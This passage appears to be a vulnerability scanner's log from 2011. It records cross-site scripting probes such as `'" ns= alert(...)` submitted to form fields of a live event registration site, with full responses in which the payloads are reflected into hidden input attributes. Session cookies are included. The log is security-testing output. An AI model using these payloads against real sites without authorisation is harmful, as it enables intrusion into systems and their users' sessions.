Referer: https://www.eiseverywhere.com/ereg/newreg.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=9f949b3b69e74253b94bca5fe0a26cc8
Host: www.eiseverywhere.com
Cookie: PHPSESSID=4v6m76svkgnnjt64tgo35hbip7; regtoken=gbqml6fifp4bp2dr1e8oukuba1
Content-Length: 1148
Accept-Encoding: gzip, deflate

--9f949b3b69e74253b94bca5fe0a26cc8
Content-Disposition: form-data; name="action"

submit
--9f949b3b69e74253b94bca5fe0a26cc8
Content-Disposition: form-data; name="eventid"

19301
--9f949b3b69e74253b94bca5fe0a26cc8
Content-Disposition: form-data; name="categoryid"

65410
--9f949b3b69e74253b94bca5fe0a26cc8
Content-Disposition: form-data; name="language"

'" ns= netsparker(0x0007F2)
--9f949b3b69e74253b94bca5fe0a26cc8
Content-Disposition: form-data; name="reference"

3
--9f949b3b69e74253b94bca5fe0a26cc8
Content-Disposition: form-data; name="eb"

3
--9f949b3b69e74253b94bca5fe0a26cc8
Content-Disposition: form-data; name="admin"

-1
--9f949b3b69e74253b94bca5fe0a26cc8
Content-Disposition: form-data; name="bridgeid"

3
--9f949b3b69e74253b94bca5fe0a26cc8
Content-Disposition: form-data; name="input[email]"

netsparker@example.com
--9f949b3b69e74253b94bca5fe0a26cc8
Content-Disposition: form-data; name="discountcode"

3
--9f949b3b69e74253b94bca5fe0a26cc8
Content-Disposition: form-data; name="selectcategoryid"

65410
-----------------------------7db109117a156e--
--9f949b3b69e74253b94bca5fe0a26cc8--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:28:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: regtoken=inrpnnvt3gj0q9rvc4td760sn2; path=/
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3002
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="25%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Select Agenda</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="submit" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="65410" /><input type="hidden" name="language" value="\'\" ns= netsparker(0x0007F2) " /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><!--Array( [cat] => 1 [fee] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><script type="text/javascript">function togglevisibility824815(val) {}</script><table cellspacing="0" cellpadding="2" id="q824815" ><tr><td width="175" align="right" valign="top" class="standard">Email Address<font class="red">*</font></td><td valign="top" class="standard"><input class="shadow" id="email" type="text" name="input[email]" value="netsparker@example.com" style="width:350px;" alt="Email Address" /></td></tr></table><table cellspacing="0" cellpadding="2" class="standard"><tr><td width="175" align="right" valign="top" class="red">ID Code</td><td><input type="text" name="discountcode" value="3" size="30" /><input type="submit" name="apply_code" value="Apply Code" /><br />(If you have been given a special identifier please enter it here)</td></tr><tr><td width="175" align="right" valign="top">Attendee Category</td><td> </td></tr><input type="hidden" name="selectcategoryid" value="65410" /></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST submit
eventid POST 19301
categoryid POST 65410
language POST '" ns= alert(0x00084D)
reference POST 3
eb POST 3
admin POST -1
bridgeid POST 3
input[email] POST netsparker@example.com
discountcode POST 3
selectcategoryid POST 65410
x POST 0
y POST 0 -----------------------------7db13e117a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=29ecffb316a644978eb17f1c6b6d0926
Host: www.eiseverywhere.com
Cookie: PHPSESSID=4v6m76svkgnnjt64tgo35hbip7; regtoken=cvcdltcghrr4eterqai23j5he6
Content-Length: 1314
Accept-Encoding: gzip, deflate

--29ecffb316a644978eb17f1c6b6d0926
Content-Disposition: form-data; name="action"

submit
--29ecffb316a644978eb17f1c6b6d0926
Content-Disposition: form-data; name="eventid"

19301
--29ecffb316a644978eb17f1c6b6d0926
Content-Disposition: form-data; name="categoryid"

65410
--29ecffb316a644978eb17f1c6b6d0926
Content-Disposition: form-data; name="language"

'" ns= netsparker(0x00084D)
--29ecffb316a644978eb17f1c6b6d0926
Content-Disposition: form-data; name="reference"

3
--29ecffb316a644978eb17f1c6b6d0926
Content-Disposition: form-data; name="eb"

3
--29ecffb316a644978eb17f1c6b6d0926
Content-Disposition: form-data; name="admin"

-1
--29ecffb316a644978eb17f1c6b6d0926
Content-Disposition: form-data; name="bridgeid"

3
--29ecffb316a644978eb17f1c6b6d0926
Content-Disposition: form-data; name="input[email]"

netsparker@example.com
--29ecffb316a644978eb17f1c6b6d0926
Content-Disposition: form-data; name="discountcode"

3
--29ecffb316a644978eb17f1c6b6d0926
Content-Disposition: form-data; name="selectcategoryid"

65410
--29ecffb316a644978eb17f1c6b6d0926
Content-Disposition: form-data; name="x"

0
--29ecffb316a644978eb17f1c6b6d0926
Content-Disposition: form-data; name="y"

0
-----------------------------7db13e117a156e--
--29ecffb316a644978eb17f1c6b6d0926--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:29:21 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: regtoken=h6jqbhgtvoeeomfp1b3cv3q9e2; path=/
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 2998
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="25%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Select Agenda</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="submit" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="65410" /><input type="hidden" name="language" value="\'\" ns= netsparker(0x00084D) " /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><!--Array( [fee] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><script type="text/javascript">function togglevisibility824815(val) {}</script><table cellspacing="0" cellpadding="2" id="q824815" ><tr><td width="175" align="right" valign="top" class="standard">Email Address<font class="red">*</font></td><td valign="top" class="standard"><input class="shadow" id="email" type="text" name="input[email]" value="netsparker@example.com" style="width:350px;" alt="Email Address" /></td></tr></table><table cellspacing="0" cellpadding="2" class="standard"><tr><td width="175" align="right" valign="top" class="red">ID Code</td><td><input type="text" name="discountcode" value="3" size="30" /><input type="submit" name="apply_code" value="Apply Code" /><br />(If you have been given a special identifier please enter it here)</td></tr><tr><td width="175" align="right" valign="top">Attendee Category</td><td> </td></tr><input type="hidden" name="selectcategoryid" value="65410" /></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST submit
eventid POST 19301
categoryid POST 65410
language POST eng
reference POST 3
eb POST 3
admin POST -1
bridgeid POST 3
input[email] POST netsparker@example.com
discountcode POST 3
selectcategoryid POST '" ns= alert(0x000898)

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=d9e79f0323c64e4091b858e0c821f6ed
Host: www.eiseverywhere.com
Cookie: PHPSESSID=4v6m76svkgnnjt64tgo35hbip7; regtoken=thddobtrk1d77nr8vm5j3jp7m4
Content-Length: 1099
Accept-Encoding: gzip, deflate

--d9e79f0323c64e4091b858e0c821f6ed
Content-Disposition: form-data; name="action"

submit
--d9e79f0323c64e4091b858e0c821f6ed
Content-Disposition: form-data; name="eventid"

19301
--d9e79f0323c64e4091b858e0c821f6ed
Content-Disposition: form-data; name="categoryid"

65410
--d9e79f0323c64e4091b858e0c821f6ed
Content-Disposition: form-data; name="language"

eng
--d9e79f0323c64e4091b858e0c821f6ed
Content-Disposition: form-data; name="reference"

3
--d9e79f0323c64e4091b858e0c821f6ed
Content-Disposition: form-data; name="eb"

3
--d9e79f0323c64e4091b858e0c821f6ed
Content-Disposition: form-data; name="admin"

-1
--d9e79f0323c64e4091b858e0c821f6ed
Content-Disposition: form-data; name="bridgeid"

3
--d9e79f0323c64e4091b858e0c821f6ed
Content-Disposition: form-data; name="input[email]"

netsparker@example.com
--d9e79f0323c64e4091b858e0c821f6ed
Content-Disposition: form-data; name="discountcode"

3
--d9e79f0323c64e4091b858e0c821f6ed
Content-Disposition: form-data; name="selectcategoryid"

'" ns= netsparker(0x000898)
--d9e79f0323c64e4091b858e0c821f6ed--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:31:23 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: regtoken=12gbfhpptgogut8n875dr8ej53; path=/
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 2752
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="25%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Select Agenda</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="preload_category" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="\'\" ns= netsparker(0x000898) " /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><input type="hidden" name="discountcode" value="3" /><!--Array( [cat] => 1 [fee] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><table cellspacing="0" cellpadding="2" class="standard"><input type="hidden" name="selectcategoryid" value="-1" /></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST submit
eventid POST 19301
categoryid POST 65410
language POST eng
reference POST 3
eb POST 3
admin POST -1
bridgeid POST 3
input[email] POST netsparker@example.com
discountcode POST 3
selectcategoryid POST '" ns= alert(0x0008BB)
x POST 0
y POST 0 -----------------------------7db13e117a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=f40c1d28f125465fb94f655e798eee46
Host: www.eiseverywhere.com
Cookie: PHPSESSID=4v6m76svkgnnjt64tgo35hbip7; regtoken=2e5l2540v0i4spchgc3nkrptr0
Content-Length: 1312
Accept-Encoding: gzip, deflate

--f40c1d28f125465fb94f655e798eee46
Content-Disposition: form-data; name="action"

submit
--f40c1d28f125465fb94f655e798eee46
Content-Disposition: form-data; name="eventid"

19301
--f40c1d28f125465fb94f655e798eee46
Content-Disposition: form-data; name="categoryid"

65410
--f40c1d28f125465fb94f655e798eee46
Content-Disposition: form-data; name="language"

eng
--f40c1d28f125465fb94f655e798eee46
